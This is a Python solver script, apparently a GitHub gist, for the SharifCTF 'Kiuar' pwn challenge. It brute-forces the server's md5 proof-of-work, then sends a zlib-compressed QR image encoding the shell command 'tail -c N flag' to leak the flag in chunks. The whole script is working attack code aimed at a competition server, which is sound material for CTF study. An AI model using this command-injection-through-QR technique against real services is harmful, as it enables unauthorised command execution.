@djekmani
Last active February 7, 2016 19:58
SharifCTF pwn 200 Kiuar
import itertools
import zlib
from hashlib import *

import qrcode
from pwn import *
# context.log_level = 'debug'
#task: telnet ctf.sharif.edu 12432
# Challenge endpoint from the task hint above (telnet host/port).
HOST, PORT = "ctf.sharif.edu", 12432
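def create_qrcode(cmd):
    """Render `cmd` as a QR-code PNG and return it zlib-compressed and padded.

    The challenge server evidently decodes a QR image and uses its text as the
    command to run (see the ``tail -c N flag`` strings built in get_chunk), so
    this encodes `cmd` into a minimal QR code, writes it to "Qr-cmd.png",
    reads the PNG bytes back, compresses them with zlib at the highest level
    and pads the result to the server's fixed payload size via pad_img.

    Returns the padded compressed PNG as a byte string.

    Fix over the original: the PNG is written and re-read in binary mode.
    The original used text-mode 'w+' and 'r', which is harmless on Linux but
    corrupts the image on platforms that translate newlines.
    """
    qr = qrcode.QRCode(
        version=1,
        error_correction=qrcode.constants.ERROR_CORRECT_L,
        box_size=1,
        border=1,
    )
    qr.add_data(cmd)
    # fit=True: presumably lets the library grow the version beyond 1 when
    # cmd does not fit — confirm against the qrcode docs if payloads grow.
    qr.make(fit=True)
    with open("Qr-cmd.png", "wb") as out:
        qr.make_image().save(out, "png")
    with open("Qr-cmd.png", "rb") as inp:
        png = inp.read()
    compressed = zlib.compress(png, zlib.Z_BEST_COMPRESSION)
    return pad_img(compressed)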
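def get_binary(line, start=67, length=22):
    """Return the `length`-character slice of `line` beginning at `start`.

    In this solver it extracts the 22-character binary target prefix from the
    server's "Give ..." challenge line; offset 67 is specific to that banner's
    layout (evidently measured by hand) and should be re-checked if the
    banner changes. Plain slicing is used, so a line shorter than
    ``start + length`` yields a shorter string rather than raising.

    The defaults reproduce the original hard-coded ``line[67:89]``.
    """
    return line[start:start + length]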
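def get_integer(bin_prefix, start=1000000000, stop=10000000000000000):
    """Brute-force the server's proof-of-work and return ``[hex_str, md5_hex]``.

    Scans integers i in ``[start, stop)``, md5-hashing the lowercase hex
    representation of i (no "0x" prefix), until the first 22 characters of
    the digest's binary expansion equal `bin_prefix`. Returns a two-element
    list ``[hex_str, digest_hex]`` on success, or ``False`` when the range
    is exhausted — callers that unpack the result must check for that.

    The comparison ``bin(int(digest, 16))[2:24]`` drops leading zero bits of
    the digest, exactly as the original did; presumably this mirrors what the
    challenge server computes, so it is kept verbatim.

    Changes from the original: ``format(i, 'x')`` replaces ``hex(i)[2:]`` so
    a Python 2 long can never add a trailing "L" to the hashed string; the
    string is ASCII-encoded before hashing so the function also runs under
    Python 3; the digest is computed once per candidate; and the search
    bounds are parameters (defaults unchanged).
    """
    for i in itertools.count(start):
        if i >= stop:
            return False
        hex_str = format(i, 'x')
        digest = md5(hex_str.encode('ascii')).hexdigest()
        if bin(int(digest, 16))[2:24] == bin_prefix:
            return [hex_str, digest]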
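def pad_img(img, size=200, fill="\x90"):
    """Right-pad `img` with `fill` up to `size` characters and return it.

    The server presumably reads a fixed 200-byte payload, so the compressed
    PNG is padded to exactly that length; the trailing filler is presumably
    ignored after the zlib stream ends. A payload already at or beyond `size`
    is returned unchanged (never truncated) — an oversized one would then be
    sent unpadded and very likely rejected, so keep the QR image small.

    The defaults reproduce the original ``img += "\\x90" * (200 - len(img))``.
    """
    missing = size - len(img)
    if missing <= 0:
        return img
    return img + fill * missing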
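def get_chunk():
    """Leak the flag in two pieces from the challenge server and reassemble it.

    For each tail length in `chunk` a fresh connection is opened, the
    server's proof-of-work (a 22-bit md5 prefix, see get_integer) is solved,
    and the padded QR payload carrying ``tail -c <n> flag`` is sent. The
    reply is sliced at offset 103 (a hand-measured offset into the server's
    response) and the pieces are prepended in order; the literal 'SharifCT'
    prefix is hard-coded rather than leaked.

    Returns the assembled flag string.

    Fixes over the original loop: every connection is closed on all paths,
    a failed brute-force raises RuntimeError instead of an unpack TypeError,
    and get_integer's result no longer shadows hashlib's ``md5`` name.
    """
    chunk = [19, 36]
    flag = ''
    for i in chunk:
        cnx = remote(HOST, PORT)
        try:
            cmd = "tail -c " + str(i) + " flag"
            data = create_qrcode(cmd)
            print("[+] Qr-code compressed Zlib image created")
            line = cnx.recvline_startswith('Give', True)
            cnx.recv()
            prefix = get_binary(line)
            print("[+] prefix: " + prefix)
            print("[+] Bruteforcing md5 hash")
            found = get_integer(prefix)
            if not found:
                raise RuntimeError("no integer found for prefix " + prefix)
            integer, digest = found
            print("[+] integer is: " + integer)
            print("[+] md5 hash is: " + digest)
            print("[+] Sending the integer")
            cnx.send(integer)
            # Consume the server's output up to 'T' (presumably the next
            # prompt) before sending the image; the text itself is unused.
            cnx.recvuntil('T')
            print("[+] Sending compressed image")
            cnx.send(data)
            resp = cnx.recv()
        finally:
            cnx.close()
        print("[+] Chunk leaked: " + resp[103:] + "\n")
        # Later (longer) tails go in front; presumably the server truncates
        # its reply so the pieces abut rather than overlap — verify offsets.
        flag = resp[103:] + flag
    return 'SharifCT' + flag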
# Entry point: run the two-stage leak and print the reassembled flag.
flag = get_chunk()
print("[+] The final flag is: %s" % flag)